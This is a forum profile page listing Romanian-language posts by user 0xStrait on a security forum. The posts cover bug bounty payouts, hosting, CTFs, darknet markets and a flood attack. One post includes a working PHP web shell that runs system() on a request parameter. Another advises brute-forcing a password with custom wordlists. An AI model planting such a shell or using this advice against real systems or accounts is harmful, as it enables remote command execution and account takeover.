Jump to content

0xStrait

Active Members
  • Content Count

    160
  • Joined

  • Last visited

  • Days Won

    2

0xStrait last won the day on January 12

0xStrait had the most liked content!

Community Reputation

61 Excellent

1 Follower

About 0xStrait

Recent Profile Visitors

1939 profile views
  1. E tare tipul, a luat vreo $30k. Asta a luat $70k de la Yahoo si mai e un indian care a luat $100k de la Apple pentru account takeover. Toate vulnerabilitatiile fiind WEB APP.
  2. Ce e 404 hidden shell? Daca e cum zici tu lasa link-ul complet cu parametrul. Aia e pagina default de la apache...
  3. Digitalocean lafel 100% uptime aproximativ 2 ani, tin pe el un wordpress si il folosesc la teste uneori. Bine... pretul difera.
  4. Mi se pare super ideea, daca s-ar potrivi timpul incat sa fiu liber, mi-ar placea sa particip la un CTF. Ca si platforme pt. conferinta se pot folosii Microsoft Team, BlueJeans sau cel mai rau caz Skype (toate platformele mentionate le-am intalnit in timpul interviurilor si au fost OK). Ca si idee de subiect ar fi: "Metodologia unui pentester roman" zic roman pentru ca sunt curios cum abordeaza un roman situatia, fiecare nationalitate are un anume stil, de ex: indienii se focuseaza mai multe pe partea de bruteforce tot ce tine legat de (asset discovery, auth bypass, token, etc
  5. @makav3li mane daca ai inceput discutia du-o pana la capat, care-s forum-urile alea unde se gasesc exploit-uri si chestii private care tin de securitate si nu se gasesc pe motoarele de cautare care indexeaza? Stiu doua printre cele mai mari care au fost inchise de catre FBI, dark0de si omerta, pe ambele se vindeau dr*gs si nu se faceau livrari doar in tarile mai permisive (USA, Olanda, UK, Germania si probabil alte tari nordice), conturi de diferite platforme si medicamente care in mod normal aveai nevoie de reteta, in nici-un caz asasinari, p0rn0grafie si cacaturi cum zic toti ^vl
  6. 0xStrait

    Atac flood

    @Bunicu2 urca un fisier /test.txt cu mesajul rstforums.com sa ne demonstrezi ca e forum-ul tau si daca am timp iti fac un test... dar pariez ca pica la chestii simple cum ar fi o lista de proxy-uri care acceseaza simulat forum-ul // sau urca test.php si lasa link =)))) <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  7. Descarca asta sau incearca o alta alternativa care face acelasi lucru (bruteforce), mai ai nevoie de un wordlist. Ca sa cresti sansele de succes, trebuie sa analizezi indiciile (daca ai), sa cauti / creezi un wordlist custom in functie de limba, tipologie, hobbies and shit. Oricum nu e garantat 100% ca o sa reusesti. Succes! // Sper ca asta nu se catalogeaza ca idei de frauda, e pur educational. E nevoie de chestia aia cu "pe propria raspundere" ?
  8. © 2017 All Rights Reserved Terms of Use Privacy Policy No-Spam Policy wtf?
  9. De ce sa te complici cu asta? Ce sa mai faca vedetele care au 100k conturi false? Totul depinde de inteligenta oamenilor care o inconjoara pe sora ta, daca ei sunt atat de slab pregatiti incat sa nu recunoasca un cont fals, atunci sorry. Legea atractiei -> daca acorzi atentie chestiilor de genul asta, asta o sa atragi. Pur si simplu trebuie ignorat totul, daca te complici cu declaratii si dosare, la cum se misca lucrurile in ro o sa ai batai si mai mari de cap. Succes!
  10. @grandson, daca virusul e construit pentru Windows nu v-a afecta si Iphone-ul care foloseste un alt sistem de operare (iOS).
  11. Te referi la faptul ca (,) Chrome detecteaza si raporteaza mai departe? Daca la aste te referi, raspunsul este nu.
  12. Felicitari! Triage & reward time? Sunt curios cat de repede se misca
  13. 0xStrait

    Bug Bounty

    @mDOS, frustrant... cred ca o buna parte din reusita se datoreaza perseverentei. Uneori o pauza de 1-2 zile ridica moralul. @BiosHell, ne impartasesti si tu din experientele tale?
  14. 0xStrait

    Bug Bounty

    Sunt mai multi interesati, cel putin cunosc 3-4 de pe acest forum. Mai bine discutatm aici... sunt sanse mai mari sa atragem interes si alte persoane dornice sa schimbe idei/tips/tricks/writeups. @mDOS, ce platforme folosesti? The biggest bounty? Programe private? Blog/twitter?
  15. E copil nu va luati de el... @onlyz69 sau @GeorgeZ... era un proverb. "Nu ai cum sa vinzi castraveti gradinarului" sau cum plm era. Mai bine invata lucruri care te ajuta. Am mai zis-o intr-un post, sunt copii de 15-16 ani care fac sume ok din bug bounty, reprofileaza-te.
×
×
  • Create New...